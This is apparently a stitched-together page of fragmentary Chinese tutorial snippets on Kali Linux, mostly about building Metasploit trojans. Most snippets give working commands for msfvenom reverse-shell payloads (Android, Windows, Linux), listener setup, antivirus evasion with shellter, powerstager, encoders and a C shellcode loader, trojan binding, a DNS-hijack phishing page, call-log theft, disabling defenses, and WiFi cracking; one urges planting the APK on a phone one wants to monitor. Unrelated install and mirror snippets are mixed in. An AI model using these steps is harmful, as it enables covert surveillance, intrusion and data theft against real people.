先看Kali的ip,我的是192.168.0.101 然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555...R > /root/apk.apk 这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 然后输入命令:msfconsole来启动msfconsole,启动过程需要等待一会儿...payload android/meterpreter/reverse_tcp //选择Payload 3.show options //查看参数设置 这里需要设置LHOST的ip地址,也就是你的kali...的ip地址 还有LPORT端口,刚才设置的为5555,也需要更改一下(刚才直接设置为4444也是可以的) 1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP...地址 2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口 3.exploit //开始执行漏洞 开始监听,等待手机上线 接下来就要发挥你的聪明才智将这个apk装在你想监控的手机上了
版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击,如浏览器攻击,DLL。该工具使用流行的有效负载编译恶意软件,然后编译后的恶意软件可以在windows,android,mac上执行。...在这里我们选择第五个、意思是生成一个apk的后门,就是android的app。如图 ? 点击回车后 我们开始配置我们的本地IP地址,和监听的端口。以及放置游戏apk文件的地址,如图所示。 ?...以及放置游戏apk文件的地址,如上图出现1-6选项,我们选择3生成一个tcp的反弹链接。 然后选择2配置生成后门,我们可以看到已经有后门程序的总览。如图所示 ?...这样木马就生成了,在home/Thefatrat/backdoored目录下 启动msf,配置监听模块,反弹链接,攻击机IP地址,监听端口,执行攻击exploit。...如图所示 在kali的命令行中输入msfconsole 来启动msf 启动后如图 ?
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。...思路如下: 实现内网穿透 Metasploit木马操作 一、实现内网穿透 1.进入https://natapp.cn/,根据提示注册并创建免费隧道 ?...2 进入https://natapp.cn/#download下载linux的客户端 ? 3 命令行内启动natapp。语句: ....得到ip地址是xxx.x.xx.x 后面位端口号:34611 二、Metasploit木马操作 5.生成木马APP。...reverse_tcp LHOST=服务器的ip(上面ping服务器得到的ip) LPORT=34611(上面服务器的端口号) R > /root/apk.apk 34611是设置的端口,显示这个说明已经生成木马成功了
由于 Kali 是基于 Debian 的,因此按照 README 中 Debian 的方法,首先安装依赖: 1 root@kali:~# apt-get install cmake valac libgtk...-3-dev libkeybinder-3.0-dev libxml2-utils gettext txt2man 再编译包: 1 2 3 4 5 root@kali:~# git clone https...://github.com/phw/peek.git root@kali:~# mkdir peek/build root@kali:~# cd peek/build root@kali:~# cmake...-DCMAKE_INSTALL_PREFIX=/usr -DGSETTINGS_COMPILE=OFF .. root@kali:~# make package 最后安装包: 1 root@kali...:~# dpkg -i peek-x.y.z-Linux.deb
俗称为免杀 官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话 就需要安装wine...我使用的Kali Linux 版本是kali-linux-2020.2目前最新版本 注意的是shellter目前只能注入32位的可执行文件 开始安装: 1....//选择第一个 SET LHOST: 192.168.37.137 //设置反弹回来的IP 本机 SET LPORT:4444 //设置接收反弹的端口 这样我们的木马后门
利用powerstager制作免杀木马 ---- 安装powerstager 此工具需要python3的支持 apt-get install python3 apt-get install mingw-w64...install 制作免杀 python3 powerstager.py -m -t win64 --lhost=10.0.2.15 --lport=9055 -o /root/test.exe 会在root目录下生成一个...test.exe后门程序 lhost填写kali上线IPlport上线端口 image.png 利用msfconsole监听木马 use exploit/multi/handler set payload...windows/x64/meterpreter/reverse_tcp set lhost 10.0.2.15 set lport 9055 exploit image.png 运行木马获取shell...运行木马获取回话 image.png 火绒查杀 image.png
—- 网易云热评 一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter...192.168.139.133 lport=8585 -f c -p:指定payload -e:指定选择使用的编码 -i:给payload编码的次数 -b:避免出现的字符 -f:输出文件类型 二、通过VS2019编译免杀木马...PAGE_EXECUTE_READWRITE); memcpy(exec, buf, sizeof buf); ((void(*)())exec)(); return 0;} 3、生成解决方案...4、右击生成的木马,使用36X扫描 三、实战操作 1、上传生成的木马到服务器,假设就是本地服务器 2、打开msf,选择合适的攻击模块,run运行 3、在服务器运行免杀木马,成功获取shell 禁止非法
前天在群里问了如何生成.wsf msf马,今天写出了实例,分享出来,同时期待亮神的佳作。...wsf后门思路: 1)学习.wsf脚本格式 2)msf生成vbs 3) msf生成vbs插入.wsf脚本格式 4)尝试运行查看是否报错 5)反弹shell 开始制作脚本: 1) .wsf脚本格式 ?...job id="IncludeExample"> 2) msf生成...3) msf生成vbs插入.wsf脚本中 ? 4)尝试运行无查看是否报错: 直接运行无报错 ? 使用cscript.exe (WindowsScript Host引擎),运行无报错: ?
例如,如果你想生成一个反向连接的Linux,可以使用以下命令: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT...windows.exe的木马程序。...把生成的windows.exe木马文件拖放到windows靶机上,运行。...我们在kali运行mafconfig,后运行 use exploit/multi/handler 设置好端口和ip(ip和端口都是kali的)。...图片 本篇文章就到此结束了,注,本文章只能用于学习,生成的木马文件不得传播,传播后造成损失的将会按照法律依法处理。
利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马 ---- 前言 内网渗透,非公网IP上线。 不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏 互联网非法外之地,还请各位兄弟谨记,且行且珍惜。...第一步 生成安卓木马 msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk...image.png 第二步制作钓鱼网页 在这里我已经简单的准备了一个页面 代码如下 image.png 将生成的木马和编写页面放置到/var/www/html/目录下 image.png...set LHOST 192.168.123.10 //kali 本机的ip set LPORT 9055 //监听上线的端口 需要与生成木马的时候填写一样 exploit //执行监听 image.png...使用木马窃取信息 现在我们先使用木马窃取对方通话记录 在终端输入dump_calllog 此时返回的数据应该是 meterpreter > dump_calllog [*] Fetching 243 entries
kali linux的使用教程 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++...安装文件: 链接:https://pan.baidu.com/s/11ZBV1RJZjW9Gi53YZ7Q31Q 提取码:lqh1 安装教程网上自行百度,这里不再详说 (2)安装kali-linux...kali-linux的iso文件: 链接:https://pan.baidu.com/s/1keH6-us_H9uMuApgmf0ZeA 提取码:lqh2 **也可进入kali官网下载镜像文件 kali...,在Downloads中选择Download Kali Linux, **安装完成之后打开kali linux (3)准备网卡 购买网卡时应该注意: 1、该网卡可以连接kali linux 2、该网卡具有监听模式...rockyou.txt /home/wifi2/test2-02.cap 显示激活成功教程成功: 虽然激活成功教程成功了,但是我的密码是自己写进rockyou.txt文件中的,要不然需要等待一段时间所以使用kali-linux
Kali Linux 教程 之 Kali Linux 更新源 最近官方的更新源,总是访问不到,这可能导致需要kali头文件的功能(比如virtualBox的增强功能,或者输入法安装)失败。...#官方源 deb http://http.kali.org/kali kali main non-free contrib deb-src http://http.kali.org/kali kali.../kali kali main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib...non-free #新加坡kali源 deb http://mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb-src http:...//mirror.nus.edu.sg/kali/kali/ kali main non-free contrib deb http://security.kali.org/kali-security
信息安全爱好者经常使用的Kali-Linux需要经常更新,扩充弹药,最近在关注Kali-Linux的时候发现一个比较有意思的文档。...而现在我们有Kali Linux metapackage 直白的理解Kali Linux metapackages就是kali的专项工具包,目前kali提供的metapackages如下: ?...我们可以执行以下命令获得metapackages列表 apt-get update && apt-cache search kali-linux 执行以下命令获得该kali-linux-web所包含的的工具列表...apt-get update apt-cache show kali-linux-web |grep Depends 执行以下命令安装kali-linux-web所包含的的工具 apt-get install...kali-linux-web 如下图为需要安装的软件列表 ?
kali中一个经常会用到的框架,今天主要的介绍内容是木马程序的生成和后渗透一些提权。...首先是利用msfvenom生成木马程序 msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp LHOST=黑客端IP...LPORT=3344 -b "\x00" -e x86/shikata_ga_nai -f exe > msf.exe 这里生成木马之后转到目标机器中 使用命令 msfdb run 运行软件 到这里我们就需要选择一下我们的监听设备...enable_rdp 开启远程桌面并创建一个新的用户 run getgui -u username -p password 开启远程桌面并绑定8888端口 run getgui -e -f 8888 然后可以使用kali...allprofiles state off 关闭windefend net stop windefend 关闭dep(数据执行保护) bcdeit.exe /set {current} nx AlwaysOff 关闭kali
Cupp是一款用Python语言写成的可交互性的字典生成脚本。尤其适合社会工程学,当你收集到目标的具体信息后,你就可以通过这个工具来智能化生成关于目标的字典。...最后在命令执行的目录里生成字典文件。 注意:输入生日信息的时候是按照日、月、年的顺序,如11021990就是1990年2月11 最后查看生成的字典文件 ?...cewl教程: cewl是通过爬取网站的时候,根据爬取内容的关键字生成一份字典,通过这种方式生成的字典可以作为cupp生成字典的补充。...cewl是kali自带的脚本工具,我崇尚日常使用都使用自带的工具,即使虚拟机坏了,再找一个虚拟机立马就能干活而不需要配置环境。
众所周知,骑木驴是一种很爽的酷刑,呸,木马是一种很恶毒的刑罚,对于我们黑客来说,一个好的木马,不仅仅是能达到让对方爽的目的,更要做好安全措施。废话不多说,正文开始。...生成一个后门我们首先使用msfvenom命令来生成一个木马程序。...这里我解释一下参数 -a是位数32位,--platform是木马运行的系统 -p是payload 后门两个是本机的IP和开启监听的端口 -b是去坏字符 -e是加编码器一定程度免杀 -i是迭代次数也可一定程度免杀...:payload、你的IP和端口,要和木马设置的一样 然后我们启动监听 我们上Windows访问下载木马 下载之后运行 成功上线。...然后我们就需要上套了,选择一个我们感觉正规的软件 我们这里先复制一个软件进去, 然后我们开始捆绑这个软件 生成的时候加上这个-x参数就可以 然后我们下载这个软件放到原本的软件包中。
第二章 定制 Kali Linux 作者:Willie L....Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 这一章会向你介绍Kali的定制,便于你更好地利用它。...使用Broadcom 无线USB适配器可以让我们在Kali上连接我们的无线USB接入点。对于这本书的其余秘籍,我们假设Broadcom 无线驱动已经安装。 准备 完成这个秘籍需要网络连接。...由于Kali的包在发布之间会不断升级,你很快就会发现比起之前在你的DVD中下载好的工具,又提供了一系列新的工具。我们会以升级来开始,之后获得Nessus的激活码,并以安装Squid来结束。...从Applications Menu | Kali Linux | Forensics | Digital Anti Forensics | truecrypt运行TrueCrypt,你会看到下面的窗口
目录 Msfvenom 生成exe木马 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。...· –c:添加自己的shellcode · –x | -k:捆绑 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27...32位的test.exe文件 利用 upx 加壳 upx -9 test.exe -k -o test2.exe 下面介绍一些生成其他格式的木马!...msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk Linux...: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf
1,准备工作 kali-linux-2020.2-installer-amd64 链接:https://pan.baidu.com/s/1JIVRTQm0Qdmubk-bFj6Iow kali_v2019.2....zip 链接:https://pan.baidu.com/s/19Lvcv8UUNCrjFipxNiISDA kali-linux-1.0.6-amd64 链接:https://pan.baidu.com.../s/1Dc0X-lpvZWr-JWgvc9wi1g kali-linux-2020.2a-vmware-amd64 链接:https://pan.baidu.com/s/157_r7rDPeJVQqyHisjh...-6A 2,现在开始安装kali linux,首先创建一个新的虚拟机 其他的都默认就可以了,这一步我们选择稍后安装操作系统 这里的选择别太低就可以,影响不是太大 给你的第一个渗透系统取一个你喜欢的名字把...这里可以根据自己的电脑来设置,别超过你的电脑就可以 这一步是为你的kali设置硬盘大小 指定磁盘的文件名我这里是Ubuntu 64 位.vmdk 这里就是你设置kali的信息都在这里
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
